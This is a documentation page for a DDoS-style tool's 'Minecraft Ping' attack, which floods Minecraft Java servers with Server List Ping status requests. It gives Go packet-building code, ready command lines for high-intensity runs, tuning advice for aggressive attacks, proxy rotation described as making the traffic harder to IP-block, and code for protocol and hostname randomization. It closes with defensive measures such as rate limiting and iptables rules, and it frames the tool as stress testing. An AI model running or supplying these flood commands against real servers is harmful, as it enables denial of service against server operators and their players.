Skip to main content

Overview

Minecraft Ping is a specialized Layer 7 attack designed specifically for Minecraft Java Edition servers. It exploits the Server List Ping protocol by flooding the server with status requests, forcing it to process packet parsing, JSON serialization, and response generation for each request.
This attack uses the legitimate Minecraft protocol and appears as normal server list pings.

How it works

The Minecraft Ping attack implements the official Minecraft Server List Ping protocol:
  1. TCP Connection: Establishes connection to target server (default port 25565)
  2. Handshake Packet: Sends protocol handshake with:
    • Packet ID: 0x00
    • Protocol Version: 754 (Minecraft 1.16.4+)
    • Server Address: Target hostname
    • Server Port: Target port
    • Next State: 1 (status)
  3. Status Request: Sends status request packet (0x00)
  4. Response Handling: Reads partial response and discards it
  5. Connection Close: Closes connection immediately
  6. Repeat: Each thread continuously sends new ping requests

Minecraft protocol structure

Handshake Packet:
┌─────────────────────────────────────────┐
│ Length (VarInt)                         │
├─────────────────────────────────────────┤
│ Packet ID: 0x00                         │
├─────────────────────────────────────────┤
│ Protocol Version: 754 (VarInt)          │
├─────────────────────────────────────────┤
│ Server Address Length (VarInt)          │
├─────────────────────────────────────────┤
│ Server Address (String)                 │
├─────────────────────────────────────────┤
│ Server Port (Unsigned Short)            │
├─────────────────────────────────────────┤
│ Next State: 0x01 (VarInt)              │
└─────────────────────────────────────────┘

Status Request:
┌─────────────────────────────────────────┐
│ Length: 0x01 (VarInt)                   │
├─────────────────────────────────────────┤
│ Packet ID: 0x00                         │
└─────────────────────────────────────────┘

When to use

Minecraft Ping is effective for:
  • Minecraft server stress testing: Test your server’s capacity to handle status requests
  • Query flood simulation: Simulate massive server list queries (like from server lists)
  • DDoS protection testing: Verify if anti-DDoS plugins (like TCPShield) work correctly
  • Resource exhaustion: Test server’s JSON serialization and packet handling under load
  • Plugin stress testing: Test if monitoring/status plugins can handle high request rates
This attack can severely impact Minecraft server performance. Only use on servers you own or have permission to test.

Usage

Basic Minecraft Ping attack (uses default port 25565): 
mmb attack minecraft_ping minecraft.example.com
Explicit port specification: 
mmb attack minecraft_ping tcp://minecraft.example.com:25565
High-intensity attack: 
mmb attack minecraft_ping minecraft.example.com \
  --duration 120 \
  --delay 200 \
  --threads 50 \
  --verbose

Parameters

target
string
required
Minecraft server hostname or IP. Can include tcp:// prefix and :port suffix.
--duration
int
default:"60"
Attack duration in seconds
--delay
int
default:"500"
Delay between ping requests in milliseconds per thread
--packet-size
int
default:"512"
Not used in Minecraft Ping (kept for API consistency)
--threads
int
default:"0"
Number of concurrent threads (0 = number of CPU cores)
--verbose
boolean
default:"false"
Show detailed logs for each ping request
--no-proxy
boolean
default:"false"
Allow running without proxies (not recommended)

Expected behavior

Console output

Standard mode: 
Starting minecraft_ping against minecraft.example.com with 50 proxies
20:30:15 PPS:125 Total:125 Proxies:50
20:30:16 PPS:138 Total:263 Proxies:50
20:30:17 PPS:142 Total:405 Proxies:50
Verbose mode: 
Starting minecraft_ping against minecraft.example.com with 50 proxies
Verbose mode enabled - showing detailed attack logs
20:30:15 PPS:125 Total:125 Proxies:50 [SOCKS5 proxy.example.net:1080 -> tcp://minecraft.example.com:25565]
20:30:16 PPS:138 Total:263 Proxies:50 [SOCKS5 proxy2.example.net:1080 -> tcp://minecraft.example.com:25565]

Server-side impact

On the Minecraft server, each ping request causes:
  1. Packet parsing: Deserialize VarInt-encoded handshake packet
  2. Protocol handling: Validate protocol version and state transition
  3. Status generation: Serialize server info to JSON: 
    {
  "version": {"name": "1.20.4", "protocol": 765},
  "players": {"max": 100, "online": 15},
  "description": {"text": "Server MOTD"},
  "favicon": "data:image/png;base64,..."
}
  4. Response transmission: Send JSON response with VarInt length prefix
  5. Connection cleanup: Close connection and free resources

Technical implementation

Implementation details from internal/attacks/game/minecraft_ping.go:19-73:
  • Protocol version: Uses 754 (compatible with Minecraft 1.16-1.20+)
  • VarInt encoding: Custom writeVarInt() implementation
  • String encoding: Length-prefixed UTF-8 strings via writeString()
  • Port handling: Defaults to 25565 if target uses scheme-less format with port 80
  • Response reading: Reads 256 bytes + copies 64 more to prevent buffer clog
  • Timeout: 3-second deadline for entire operation
  • Proxy support: Full SOCKS5/HTTP proxy support

Packet construction

// Build handshake packet
var pkt bytes.Buffer
pkt.WriteByte(0x00)                                // packet id
writeVarInt(&pkt, 754)                             // protocol version
writeString(&pkt, host)                            // server address
binary.Write(&pkt, binary.BigEndian, uint16(port)) // server port
writeVarInt(&pkt, 0x01)                            // next state: status

// Frame with length prefix
var framed bytes.Buffer
writeVarInt(&framed, pkt.Len())
framed.Write(pkt.Bytes())

// Send handshake
conn.Write(framed.Bytes())

// Send status request (packet 0x00, length 1)
conn.Write([]byte{0x01, 0x00})

Attack effectiveness

  • CPU-intensive: JSON serialization for every ping
  • Favicon encoding: Base64 PNG encoding in response
  • Plugin overhead: Many plugins hook into status events
  • No caching: Most servers regenerate JSON for each request
  • Query plugins: Additional overhead from query/vote plugins
At high request rates (500+ pings/sec):
  • CPU usage spikes (JSON serialization bottleneck)
  • Network thread saturation
  • Increased tick time (gameplay lag)
  • Potential crash if max-tick-time exceeded
  • Plugin event handlers slow down
  • Lower delay: 100-200ms for aggressive attacks
  • More threads: 50-100 threads typical
  • More proxies: Harder to IP-block
  • Longer duration: Sustain pressure over time

Defense mechanisms

If you’re protecting a Minecraft server:
1

Use DDoS protection

Services like TCPShield, Cosmic Guard, or cloudflare Spectrum specifically protect Minecraft servers.
2

Rate limit status requests

Plugins like ProtocolLib can limit status requests per IP:
// Example: Max 5 status requests per IP per second
3

Cache status responses

Implement response caching to avoid repeated JSON serialization.
4

Firewall rules

Use iptables or cloud firewall to limit connections:
iptables -A INPUT -p tcp --dport 25565 -m state --state NEW \
  -m recent --set
iptables -A INPUT -p tcp --dport 25565 -m state --state NEW \
  -m recent --update --seconds 1 --hitcount 5 -j DROP
5

Monitor connection rates

Alert when new connection rate exceeds baseline.

Real-world scenarios

Testing server capacity

# Baseline: Normal server list ping rate
mmb attack minecraft_ping mc.example.com \
  --threads 5 \
  --delay 1000 \
  --duration 60

# Medium load: Simulating multiple server lists
mmb attack minecraft_ping mc.example.com \
  --threads 20 \
  --delay 500 \
  --duration 120

# High load: Stress test
mmb attack minecraft_ping mc.example.com \
  --threads 100 \
  --delay 100 \
  --duration 300 \
  --verbose

Validating DDoS protection

# Test if TCPShield/Cosmic Guard blocks attack traffic
mmb attack minecraft_ping protected.mc-server.com \
  --threads 50 \
  --delay 200

# Monitor:
# - Do proxies get blocked?
# - Does legitimate traffic still work?
# - Are there false positives?

Protocol compatibility

Protocol Version 754:
  • Compatible with Minecraft 1.16 through 1.20+
  • Works with Paper, Spigot, Purpur, Fabric, Forge servers
  • BungeeCord and Velocity proxies also vulnerable
  • Bedrock Edition servers not affected (different protocol)

Comparison with other attacks

Minecraft Ping:
  • Protocol-specific, appears legitimate
  • Triggers server-side processing
  • Harder to distinguish from real traffic
TCP Flood:
  • Generic TCP, random data
  • Minimal server processing
  • Easier to detect and block

Advanced techniques

Protocol version randomization

Modify the attack to randomize protocol versions to test version validation: 
// Current: always uses 754
writeVarInt(&pkt, 754)

// Enhanced: random versions
versions := []int{754, 755, 756, 757, 758, 759}
writeVarInt(&pkt, versions[rand.Intn(len(versions))])

Hostname spoofing

Test virtual host routing by varying the hostname sent: 
// Instead of real hostname, send variations
hosts := []string{host, "localhost", "127.0.0.1", "example.com"}
writeString(&pkt, hosts[rand.Intn(len(hosts))])

TCP Flood

Generic TCP flood for any service

HTTP Flood

Layer 7 HTTP request flood

Build docs developers (and LLMs) love

Get started for freeTalk to us